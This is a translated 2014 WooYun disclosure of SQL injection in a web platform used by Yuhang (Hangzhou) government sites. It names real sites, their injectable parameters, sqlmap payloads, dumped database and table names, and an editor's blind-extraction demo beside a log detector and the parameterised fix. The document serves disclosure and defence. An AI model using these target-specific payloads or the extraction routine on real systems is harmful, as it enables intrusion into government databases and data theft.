Vulnerability summary

Defect ID: wooyun-2014-052463

Title: Generic SQL injection in a Zhejiang software company's web platform

Related vendor: CNCERT (National Internet Emergency Center)

Author: HackBraid

Submitted: 2014-03-02 20:37

Fix time: 2014-05-31 20:38

Published: 2014-05-31 20:38

Type: SQL injection

Severity: High

Self-assessed rank: 12

Status: Handed over to a third-party partner organisation (CNCERT) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-03-02: Details sent to the vendor, awaiting vendor action
2014-03-07: Vendor confirmed; details visible to the vendor only
2014-03-10: Details opened to third-party security partners
2014-05-01: Details opened to core white hats and domain experts
2014-05-11: Details opened to regular white hats
2014-05-21: Details opened to intern white hats
2014-05-31: Details opened to the public

Brief description:

It looks like every government site, e-commerce site and school in the whole city is running it

Detailed description:

Technical support: 杭州网尽信息科技有限公司 (Hangzhou Wangjin Information Technology Co., Ltd.)
My impression is that every website in Yuhang is built on this one platform
URLs collected from Google:
1.http://www.yhfg.gov.cn/
2.http://www.yhjt.gov.cn/
3.http://www.hzyhldbz.gov.cn/
4.http://www.yhjsj.gov.cn/
5.http://www.yhdj.gov.cn/
6.http://yggc.yhlz.gov.cn/
7.http://www.yhls.gov.cn/
8.http://www.zjfuture.gov.cn/
9.http://www.yhtyzx.gov.cn/
10.http://wsj.yuhang.gov.cn/
11.http://www.yhjtjt.com/
12.http://www.yhland.gov.cn/
13.http://www.yhsjj.gov.cn/
14.http://www.zjgia.org.cn/
15.http://www.yhgcc.com
16.http://www.hitcc.cn/
17.http://www.yhlpsy.com/
18.http://www.yhsqxy.com/
19.http://www.dabongtech.com/
20.http://www.yhgh.org/
21.http://www.hztxsx.com/
22.http://www.yhlz.gov.cn/
Of the 12 gov.cn sites checked, 7 have multiple injection points, as follows:
1.http://www.yhfg.gov.cn/
http://www.yhfg.gov.cn/messages_detail.aspx, POST body password=88952634&classid=5&membername=88952634 - SQL injection (POST)
http://www.yhfg.gov.cn/list.aspx, POST body =88952634&stype=1&filterkeyword=88952634 - SQL injection (POST)
http://www.yhfg.gov.cn/messages.aspx?classid=5, POST body __VIEWSTATE=%2FwEPDwUKMTgzNzAwNTUyMw9kFgJmD2QWAgIBD2QWBAIBD2QWAmYPFgIeC18hSXRlbUNvdW50AgQWCGYPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjcAAAzmiJHopoHlkqjor6JkAgEPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjgAAAzmiJHopoHlu7rorq5kAgIPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MjkAAAzmiJHopoHmipXor4lkAgMPZBYCZg8VBBhtZXNzYWdlcy5hc3B4P2NsYXNzaWQ9MzAAAAzkv6Hku7blpITnkIZkAgUPZBYCAgMPDxYCHgdWaXNpYmxlaGRkZLifm8IZkVPiKTvsTLIUIz5pCjlK&__VIEWSTATEGENERATOR=8EE02EF5&action=add&search_pwd=88952634 - SQL injection (POST)
2.http://www.yhjt.gov.cn/
http://www.yhjt.gov.cn/sltszt/pic.aspx?classid=107 - SQL injection (GET)
http://www.yhjt.gov.cn/sltszt/news.aspx?classid=105 - SQL injection (GET)
3.http://www.hzyhldbz.gov.cn/
http://www.hzyhldbz.gov.cn/sun_more.aspx?classid=434&item=0 - SQL injection in GET parameter classid
http://www.hzyhldbz.gov.cn/search.aspx, POST body __VIEWSTATE=%2FwEPDwULLTIxMTE2NzE1MDdkZB3l0iR%2BPgpLIUfm4JRbi%2FLwNTk%2B&TextXM=88952634&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634 - SQL injection (POST)
4.http://www.yhjsj.gov.cn/
http://www.yhjsj.gov.cn/newsshow-pic.asp?id=123 - SQL injection (GET)
http://www.yhjsj.gov.cn/info.asp?id=4 - SQL injection (GET)
http://www.yhjsj.gov.cn/city.asp?id=234 - SQL injection (GET)
http://www.yhjsj.gov.cn/newsshow.asp?ID=6601 - SQL injection (GET)
http://www.yhjsj.gov.cn/gsl.asp?id=339&lid=5 - SQL injection in GET parameter id
http://www.yhjsj.gov.cn/search.asp, POST body imageField=88952634&keyword=%3D'%D5%BE%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%CF%A2%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD')%7Bthis.value%3D''%7D - SQL injection (POST)
http://www.yhjsj.gov.cn/office/other/login2.asp, POST body password=88952634&username=88952634 - SQL injection (POST)
http://www.yhjsj.gov.cn/aboutiframe.asp?id=45 - SQL injection (GET)
http://www.yhjsj.gov.cn/search.asp?keyword= - SQL injection (GET)
5.http://www.yhdj.gov.cn/
http://www.yhdj.gov.cn/special/hzno9/news.aspx?classid=249 - SQL injection (GET)
http://www.yhdj.gov.cn/special/hzno9/feedbackList.aspx?classid=252 - SQL injection (GET)
http://www.yhdj.gov.cn/special/xzfz/news.aspx?classid=205 - SQL injection (GET)
http://www.yhdj.gov.cn/special/xzfz/feedbackList.aspx?classid=213 - SQL injection (GET)
http://www.yhdj.gov.cn/special/llxb/news.aspx?classid=163 - SQL injection (GET)
http://www.yhdj.gov.cn/special/llxb/feedbackList.aspx?classid=173 - SQL injection (GET)
http://www.yhdj.gov.cn/special/2011/pic.aspx?classid=224 - SQL injection (GET)
http://www.yhdj.gov.cn/special/2011/news.aspx?classid=225 - SQL injection (GET)
http://www.yhdj.gov.cn/beautiful/news.aspx?classid=122 - SQL injection (GET)
http://www.yhdj.gov.cn/special/2011/feedbackList.aspx?classid=228 - SQL injection (GET)
http://www.yhdj.gov.cn/kxfzg/List.aspx?classid=84 - SQL injection (GET)
http://vod.yhdj.gov.cn/playList.aspx?cid=1 - SQL injection (GET)
http://www.yhdj.gov.cn/diaocha/list.aspx?cid=3, POST body dc_t13=88952634&dc_r7=6 - SQL injection (POST)
http://vod.yhdj.gov.cn/news.aspx, POST body filterkeyword=88952634&imageField3=88952634&classid=0 - SQL injection (POST)
6.http://yggc.yhlz.gov.cn/
http://yggc.yhlz.gov.cn/iteminfo.aspx?itemID=80 - SQL injection (GET)
http://yggc.yhlz.gov.cn/newlist.aspx?categoryID=11 - SQL injection (GET)
http://yggc.yhlz.gov.cn/search.aspx, POST body textfield=88952634&selyear=88952634 - SQL injection (POST)
7.http://www.yhls.gov.cn/
http://www.yhls.gov.cn/news.aspx?classid=14 - SQL injection (GET)
http://www.yhls.gov.cn/pic.aspx?classid=32 - SQL injection (GET)
http://www.yhls.gov.cn/news.aspx?deep=1&classid=20 - SQL injection in GET parameter classid
http://www.yhls.gov.cn/xxgk/newsshow.aspx?artid=13961&classid=125 - SQL injection in GET parameter artid
http://www.yhls.gov.cn/news.aspx, POST body filterkeyword=88952634&imageField=88952634&classid=0 - SQL injection (POST)

Proof of vulnerability:

1.http://www.yhfg.gov.cn/

available databases [30]:
[*] jjdd_2007
[*] jjdd_2009_car
[*] JTSafe
[*] lsj
[*] master
[*] model
[*] msdb
[*] Northwind
[*] prjsunlinght
[*] ProjectReserve
[*] pubs
[*] SafetySurvey
[*] safetySurvey_2013
[*] tempdb
[*] YH_BTMS
[*] yhajj
[*] YHBZB
[*] yhczj
[*] yhfgw
[*] yhhszh_2012
[*] yhjsj_oa
[*] yhjw
[*] yhkjj
[*] yhlz_gov
[*] yhrd
[*] yhsafe_HiddenTrouble
[*] yhsafetymanagement
[*] yhsjw
[*] yhzsw


Database: YHBZB
[113 tables]
+------------------------------+
| AD_Couplet |
| ArtClass |
| ArtKeyNumber |
| ArtPushDocument |
| ArtSubAttribute |
| ArtTemplet |
| Articles |
| BS_Correlative |
| BS_Department |
| BS_SX_Correlative |
| BS_ShiXiang |
| Category |
| CharView |
| ColumnsCount |
| Correct |
| DC_Class |
| DC_ClassZ |
| DC_Info |
| DC_Option |
| DC_User |
| DateTime |
| Department |
| FileCategory |
| FileCategoryRelation |
| FileType |
| FilterWord |
| ImageInformation |
| InfoDepartment |
| InfoType |
| Information |
| JdzComment |
| JdzSubject |
| Leader |
| LeaderDepartment |
| LeaderRelation |
| M_C |
| Mail |
| Message_del |
| Message_table |
| Project |
| ProjectPlan |
| ProjectProcess |
| ProjectRelationShip |
| Remark_table |
| SpecialSubjectComment |
| SystemLog |
| VIEW1 |
| VIEW2 |
| VIEW3 |
| VIEW3g |
| VIEW4 |
| VIEW5 |
| VIEW6 |
| VIEW7 |
| VIEW8 |
| VIEW_ManYiBuManYiDanWei |
| VIEW_OpenArticles |
| VIEW_XXGK_Articles |
| VIEW_XXGK_DepartmentCategory |
| VIEW_t |
| VIEW_t2 |
| aqscr |
| art_department |
| artdepartment |
| bs_department_link |
| columnshits |
| dtproperties |
| hy_dingdan |
| hy_users |
| imgart |
| newclass |
| oldclass |
| optionid_del |
| sp_at |
| sysconstraints |
| syssegments |
| tab_ClassMapped |
| tab_LiuYan |
| tab_artAuditing |
| tab_bum |
| tab_collection |
| tab_comment |
| tab_config |
| tab_dictionary |
| tab_feedback |
| tab_friendlylink |
| tab_group |
| tab_group_class |
| tab_log |
| tab_module |
| tab_mokuai |
| tab_piao |
| tab_poll |
| tab_popup |
| tab_prjectSchedule |
| tab_project |
| tab_skin |
| tab_tem |
| tab_tem_del |
| tab_txl |
| tab_user |
| tab_user_class |
| tab_vote |
| tab_web |
| tab_web_user |
| temp_XXGK_delartmentInfo |
| view_artauditing |
| view_articles |
| vod_class |
| vod_info |
| vod_server |
| votemsgtem |
| voteview |
+------------------------------+


2.http://www.yhjt.gov.cn/

Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=107) AND 4597=4597 AND (6212=6212
Type: UNION query
Title: Generic UNION query (NULL) - 52 columns
Payload: classid=107) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(103)+CHAR(100)+CHAR(115)+CHAR(113)+CHAR(121)+CHAR(103)+CHAR(107)+CHAR(109)+CHAR(74)+CHAR(121)+CHAR(82)+CHAR(109)+CHAR(78)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(121)+CHAR(110)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: classid=107) AND 5453=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (9856=9856
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


3.http://www.hzyhldbz.gov.cn/

Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=434) AND 9244=9244 AND (5146=5146&item=0
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


Place: POST
Parameter: TextXM
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwULLTIxMTE2NzE1MDdkZB3l0iR+PgpLIUfm4JRbi/LwNTk+&TextXM=88952634'; WAITFOR DELAY '0:0:5'--&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwULLTIxMTE2NzE1MDdkZB3l0iR+PgpLIUfm4JRbi/LwNTk+&TextXM=88952634' WAITFOR DELAY '0:0:5'--&TextSFZH=88952634&Btnsearch=%EF%BF%BD%EF%BF%BD%D1%AF&TextZSHM=88952634
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


4.http://www.yhjsj.gov.cn/

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=123 AND 5098=5098
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-8637 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(121)&CHR(109)&CHR(117)&CHR(113)&CHR(98)&CHR(118)&CHR(81)&CHR(97)&CHR(117)&CHR(83)&CHR(70)&CHR(113)&CHR(97)&CHR(111)&CHR(113)&CHR(107)&CHR(107)&CHR(109)&CHR(113),NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access


5.http://www.yhdj.gov.cn/

Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=249) AND 7067=7067 AND (3200=3200
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classid=249) AND 3608=CONVERT(INT,(SELECT CHAR(113)+CHAR(116)+CHAR(103)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (3608=3608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(109)+CHAR(97)+CHAR(113))) AND (6360=6360
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: classid=249) AND 7999=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (5214=5214
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


6.http://yggc.yhlz.gov.cn/

Place: GET
Parameter: categoryID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: categoryID=11 AND 2309=2309
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: categoryID=11 AND 2419=CONVERT(INT,(SELECT CHAR(113)+CHAR(117)+CHAR(113)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (2419=2419) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(121)+CHAR(122)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: categoryID=(SELECT CHAR(113)+CHAR(117)+CHAR(113)+CHAR(99)+CHAR(113)+(SELECT (CASE WHEN (6420=6420) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(100)+CHAR(121)+CHAR(122)+CHAR(113))
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


7.http://www.yhls.gov.cn/

Place: GET
Parameter: classid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: classid=14) AND 8196=8196 AND (7579=7579
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: classid=14) AND 9532=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(109)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (9532=9532) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(118)+CHAR(99)+CHAR(113))) AND (5828=5828
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: classid=14) AND 5639=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND (2711=2711
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
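The sqlmap output above shows the payload shapes every one of these GET injections leaves behind in the web server log: a numeric tautology pair (AND 4597=4597 / AND 4597=4598), UNION ALL SELECT with CHAR()/CHR() chains, CONVERT(INT,(SELECT ...)) for error-based extraction, the sysusers cross-join heavy query, and WAITFOR DELAY. The following is an added example from the editor, not code from the report or from CNCERT: it parses a constructed IIS 6.0 W3C log excerpt (hosts, IPs and timestamps are made up; the query strings mimic the payloads listed above) and flags each request by the rules it matches. The caveat the report's POST findings make important: IIS W3C logs carry no request body, so the POST injections (search.aspx, login2.asp, messages.aspx, login forms) appear only as a bare POST line and cannot be found this way; those need a WAF, a request-body capturing reverse proxy, or SQL Server side tracing.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS 6.0 W3C log excerpt (not from the report). Paths and query
# strings follow the sqlmap payloads in the proof section; IPs are documentation
# addresses, timestamps are invented.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2014-03-01 10:00:01 10.0.0.5 GET /sltszt/pic.aspx classid=107 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2014-03-01 10:00:02 10.0.0.5 GET /sltszt/pic.aspx classid=107)+AND+4597%3D4597+AND+(6212%3D6212 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2014-03-01 10:00:03 10.0.0.5 GET /sltszt/pic.aspx classid=107)+UNION+ALL+SELECT+NULL,NULL,CHAR(113)%2BCHAR(103)%2BCHAR(100)%2BCHAR(115)-- 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2014-03-01 10:00:04 10.0.0.5 GET /newlist.aspx categoryID=11+AND+2419%3DCONVERT(INT,(SELECT+CHAR(113))) 80 - 203.0.113.7 Mozilla/5.0 500 0 0
2014-03-01 10:00:09 10.0.0.5 POST /search.aspx - 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2014-03-01 10:00:10 10.0.0.5 GET /sltszt/pic.aspx classid=107)+AND+5453%3D(SELECT+COUNT(*)+FROM+sysusers+AS+sys1,sysusers+AS+sys2) 80 - 203.0.113.7 Mozilla/5.0 200 0 0
"""

# Detection rules, one per sqlmap technique seen in the proof section. Ordered so
# the rule list per hit is stable. CHR() is the Access spelling used against yhjsj.gov.cn.
RULES = [
    ("boolean-tautology", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
    ("union-select",      re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("char-concat",       re.compile(r"(?:CHA?R\(\d+\)\s*[+&]\s*){3,}", re.I)),
    ("mssql-error-based", re.compile(r"CONVERT\s*\(\s*INT\s*,\s*\(\s*SELECT", re.I)),
    ("mssql-time-based",  re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("mssql-heavy-query", re.compile(r"\bsysusers\s+AS\s+sys\d", re.I)),
    ("access-union",      re.compile(r"\bMSysAccessObjects\b", re.I)),
]

def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue          # header missing or line truncated: skip, do not guess
        yield dict(zip(fields, values))

def scan_iis_log(text):
    """Return the requests whose decoded query string matches at least one rule."""
    hits = []
    for rec in parse_w3c(text):
        query = rec.get("cs-uri-query", "-")
        if query == "-":
            continue          # no query string; a POST body is never logged here
        decoded = unquote_plus(query)       # IIS logs the query as sent, still encoded
        rules = [name for name, rx in RULES if rx.search(decoded)]
        if rules:
            hits.append({
                "time": rec["time"],
                "client": rec["c-ip"],
                "path": rec["cs-uri-stem"],
                "status": rec["sc-status"],
                "rules": rules,
                "query": decoded,
            })
    return hits

def offenders(hits):
    """Count flagged requests per client address, for triage."""
    counts = {}
    for h in hits:
        counts[h["client"]] = counts.get(h["client"], 0) + 1
    return counts

if __name__ == "__main__":
    found = scan_iis_log(SAMPLE_LOG)
    for h in found:
        print(h["time"], h["client"], h["path"], h["status"], ",".join(h["rules"]))
    print(offenders(found))
```

Run it over a real ex*.log file by replacing SAMPLE_LOG with the file contents; the sc-status column is worth keeping in the output because error-based payloads against a site that leaks exceptions show up as 500s while blind ones return 200 like any normal page.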


Fix recommendation:

You know what to do!
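The report leaves the fix unstated. The following added example (the editor's, not the author's or the platform vendor's code) uses SQLite as a stand-in for the SQL Server 2000 and Access back ends, with a constructed schema whose table names are borrowed from the YHBZB listing above. It shows why the classid=107) AND 4597=4597 AND (6212=6212 payload works (the predicate is wrapped in parentheses and the value is concatenated into the SQL text), how that single true/false difference is enough to read arbitrary data out of the database, and the parameterised form that closes the hole. SQLite's length()/unicode()/substr() stand in for the LEN()/ASCII()/SUBSTRING() that would be used against SQL Server.

```python
import sqlite3

def make_db():
    """Constructed stand-in schema (assumption: the real sites' schemas are unknown);
    table names come from the YHBZB listing, the rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Articles(id INTEGER, classid INTEGER, title TEXT);
        INSERT INTO Articles VALUES (1, 107, 'Notice A'), (2, 107, 'Notice B'), (3, 108, 'Other');
        CREATE TABLE tab_user(username TEXT, password TEXT);
        INSERT INTO tab_user VALUES ('admin', 's3cret');
    """)
    return conn

def vulnerable_list(conn, classid):
    # The value is concatenated into SQL and the predicate sits in parentheses:
    # this is the query shape the "107) AND ... AND (6212=6212" payloads are built for.
    sql = "SELECT title FROM Articles WHERE (classid=" + classid + ") ORDER BY id"
    return [row[0] for row in conn.execute(sql)]

def safe_list(conn, classid):
    # Type check, then bind: the value can no longer become SQL syntax.
    cid = int(classid)                     # ValueError for anything but an integer
    sql = "SELECT title FROM Articles WHERE (classid=?) ORDER BY id"
    return [row[0] for row in conn.execute(sql, (cid,))]

def safe_list_rejects(conn, value):
    """True when the hardened query refuses the value instead of running it."""
    try:
        safe_list(conn, value)
    except ValueError:
        return True
    return False

def boolean_probe(conn, classid="107"):
    """The true/false pair sqlmap sends first; differing output means injectable."""
    true_page = vulnerable_list(conn, classid + ") AND 4597=4597 AND (6212=6212")
    false_page = vulnerable_list(conn, classid + ") AND 4597=4598 AND (6212=6212")
    return true_page, false_page

def _ask(conn, condition):
    # The oracle: True when the page still lists articles, False when it comes back empty.
    return len(vulnerable_list(conn, "107) AND " + condition + " AND (1=1")) > 0

def _bsearch(conn, expr, lo, hi):
    # Binary search for the value v with expr == v, asking only "expr > mid?".
    while lo < hi:
        mid = (lo + hi) // 2
        if _ask(conn, f"{expr}>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo

def blind_extract(conn, subquery, max_len=64):
    """Boolean-based blind extraction of a scalar subquery, about 7 requests per character.
    SQLite length()/unicode()/substr() replace SQL Server LEN()/ASCII()/SUBSTRING()."""
    length = _bsearch(conn, f"length(({subquery}))", 0, max_len)
    chars = []
    for i in range(1, length + 1):
        code = _bsearch(conn, f"unicode(substr(({subquery}),{i},1))", 32, 126)
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    db = make_db()
    print("probe:", boolean_probe(db))
    print("admin password:", blind_extract(db, "SELECT password FROM tab_user WHERE username='admin'"))
    print("hardened query rejects payload:", safe_list_rejects(db, "107) AND 4597=4597 AND (6212=6212"))
```

In the ASP.NET pages the equivalent change is a SqlCommand with typed parameters (SqlCommand.Parameters.Add, or AddWithValue) in place of string concatenation, and in the classic ASP pages an ADODB.Command with CreateParameter; it has to be applied to every parameter listed above, the POST fields included. The int() check alone is not a substitute where the value is free text such as filterkeyword, TextXM or the login fields, because there is no type to validate against; binding is what makes the value inert.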

Copyright notice: please credit HackBraid@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 20

Confirmed: 2014-03-07 09:34

Vendor reply:

CNVD has confirmed and reproduced the described issue on several instances; it has been handed to CNCERT for dispatch to the Zhejiang branch centre, with the requirement that handling reaches every affected unit.

Latest status:

None yet